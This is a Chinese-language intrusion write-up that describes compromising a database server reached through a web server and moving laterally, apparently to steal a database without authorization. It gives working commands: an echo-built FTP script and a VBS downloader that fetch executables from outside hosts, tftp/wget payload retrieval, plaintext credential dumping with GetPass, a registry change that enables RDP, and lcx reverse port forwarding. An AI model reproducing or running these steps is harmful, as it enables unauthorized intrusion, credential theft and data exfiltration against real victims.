站库分离拿内网服务器到拿下目标服务器
0x00 提权环境
这是一机油来问我如何脱裤~~~
然后就试试提权
看了下端口,就开了80和3389
Windows
2003 x86
既然脱裤,就可想而知肯定有数据库
由图可知该例是站库分离,当时我还傻乎乎的拿着sa去执行添加用户命令
结果连不上~~~肯定连不上撒!!!
好吧,思路有以下几条:
一、 不管这配置文件,直接在原服务器上进行提权
二、 先利用sa拿下内网服务器然后再拿下原服务器
首先试试第一条~~
0x01 原服务器上提权
无常用的第三方软件,只有从溢出下手。
悲剧的是基本所有溢出都是这样,要么被杀(麦咖啡看门),要么就是执行不了。
好吧,丢了个lpk.dll上去~~~继续下面的思路吧。
0x02 先拿下内网服务器
拿内网服务器一共也有条思路~~~
第一、不用拿下服务器,直接读取hash,然后解密,看看是否内网机器都共用该密码~~~
第二、利用lcx转发工具拿下服务器,然后再在服务器中收集信息
但是以上两个思路都需要一个东西,就是要上传文件至数据库服务器上。
如何上传文件到服务器上?
思路有很多,我就介绍常用的三种
第一种、利用cmd命令调用ftp(或者tftp)上传文件(1433传马原理)
第二种、利用sql语句进行建立临时表写入数据然后导出数据
第三种、vbs脚本上传
首先第一种(可能机油就会问为什么不用echo命令写文件到服务器中~~~~echo只能一句句写而且遇到>或者>>符号时就会自动停止,所以不用echo写~~)
首先在本机上搭建ftp服务器
配置如下:
选择文件夹,文件夹中有需要上传的文件1.txt
利用cmd写命令,一句一句的执行。
echo
open 223.85.31.141>>test.txt登陆ftp服务器,223.85.31.141为本机ip
echo
test>>test.txt写入用户名
echo test>>test.txt写入密码
echo
bin>>test.txt相当于enter,就是开始的意思
echo get
1.txt>>test.txt下载ftp服务器中的1.txt
echo
bye>>test.txt关闭ftp服务器
cmd执行完毕。
然后利用type命令查看test.txt中的文件信息
type
test.txt
---------------------------------------------------------------------------------------------------------------
open
223.85.31.141
test
test
bin
get 1.txt
如图:
成功写入
下面就调用ftp命令进行下载执行这些命令~~~~
在本机测试结果如下:
----------------------------------------------------------------------------------------------------------------------------
ftp
-s:test.txt
ftp> open 223.85.31.141
连接到 223.85.31.141。
220 Welcome
to SUS FTP Server
用户(223.85.31.141:(none)):
331 Password required for
test
230 Logged on
ftp> bin
200 Type set to I
ftp> get
1.txt
200 Port command successful
150 Opening data channel for file
transfer.
226 Transfer
complete
ftp: 收到 11 字节,用时 0.00秒 11.00千字节/秒。
ftp> bye
220
Bye
---------------------------------------------------------------------------------------------------------------------
悲剧的是在服务器上执行时,却是下面命令:
---------------------------------------------------------------------------------------------------------------------
'ftp' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
---------------------------------------------------------------------------------------------------------------------
由此可知原因大概就是ftp.exe被删除,或者有什么牛B的东西看门。
下面走第二个思路就是利用sql语句进行写入和导出~~~
本来还想好好写写存储过程的sql语句,本人就比较懒,就想在网上找找有木有直接利用脚本完成文件上传。
别说运气还真好,真找到一个Sa-Upfile
1.0(sa权限上传文件)
使用环境:SQL2000,SA权限,常用提权扩展存在。
原理:利用textcopy进行二进制导入导出。
好吧,试试看。
确实很好用,果断成功~~~~~
看来菜鸟真的是菜鸟,这就是传说中的saupfile组建~~~~
但是原理还是看看这篇文章:
如何通过SQL
SERVER远程上传文件的实现
这里还是补充下用vbs下载文件和tftp下载~~就如上面一样,一旦管理员删除ftp.exe
就无法达到上传的目的
VBS下载文件
但是脚本的强大就在这里体现~~~~
脚本上传只需要ADODB.Stream的支持,windows系统默认是支持的。
上传脚本如下(同样是cmd执行如下命令):
echo
Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open
^"GET^",^"http://f4ck.yueyan.net/yueyan.exe^",0:xPost.Send():Set sGet =
CreateObject(^"ADODB.Stream^"):sGet.Mode = 3:sGet.Type =
1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile ^"C:\yueyan.exe^",2
>down.vbs
然后执行cscript
down.vbs就可以完成下载。
Tftp下载:
Tftp下载应该是这当中最简单的上传方式,为什么我会最后提,并且我并不推荐tftp上传。
只是为大家介绍一下就行了。
原因就是tftp是基于udp协议,了解udp和tc/ip协议的人都应该知道udp协议设计就是为了传输少量数据。QQ聊天消息就是基于这个协议。所以只能传输小文件,当然传输一个wget还是毫无压力的~~~~但是有时候会存在一些杀毒软件会阻止该传输过程~~所以不建议。
说说利用方法:首先现在本机大家tftp服务器
然后在服务器上执行命令,一条就够了
tftp-I
<your ip> get yueyan.exe
path/yueyan.exe
例如我要下载yueyan.exe到c盘根目录,就执行
tftp–I 110.110.110.110 get
yueyan.exe
c:/yueyan.exe
就这么简单,如果不加路径默认是system32这个目录。
如果下载文件比较多,建议上传一个wget.exe
命令如下:
Wgethttp://f4ck.yueyan.com/yueyan.exe
这样上传其他文件就方便了
首先先用GetPass.exe直接抓取明文密码
------------------------------------------------------------------------------------------------------------------------------
UserName:
Administrator
LogonDomain:
WIN-QUB8GLT3HKB
password:000
--------------------------------------------------------------------------------------------------------------------------------
要不要这样~~~~000,这么在原服务器上试了试。
登陆不上,好吧我承认我今天踩死了一只打屁虫~~~
这个很好解决.先看服务器是否开启3389
用netstat–an查看木有开启3389,又用cmd查看远程终端:
REG
query HKLM\SYSTEM\CurrentControlSet\Control\Terminal"
"Server\WinStations\RDP-Tcp /v PortNumber
由于系统权限,可以直接命令开启
开启3389:
REG
ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v
fDenyTSConnections /t REG_DWORD /d 0 /f
开完之后直接转发就ok了~~
本机执行lcx
-listen 51 33891
服务器执行lcx–slave 223.85.31.141 51 127.0.0.1
3389
连接127.0.0.1:33891
好吧~~~终于进去了~~~
0x03 从内网慢慢来拿原服务器
拿下一台服务器现在祭出我的神器~~~h-scan
再祭出神器二~~~sqltool
一个个的提权~~~~
疯狂的拿服务器~~~~拿服务器是为什么呢?收集信息嘛~~
拿一个服务器,抓一个服务器的密码~~~~
得到好几个密码~~~~
然后再到本机上登陆
成功登陆
从实际来讲拿这个服务器并无实际的原因,就是想提权~~~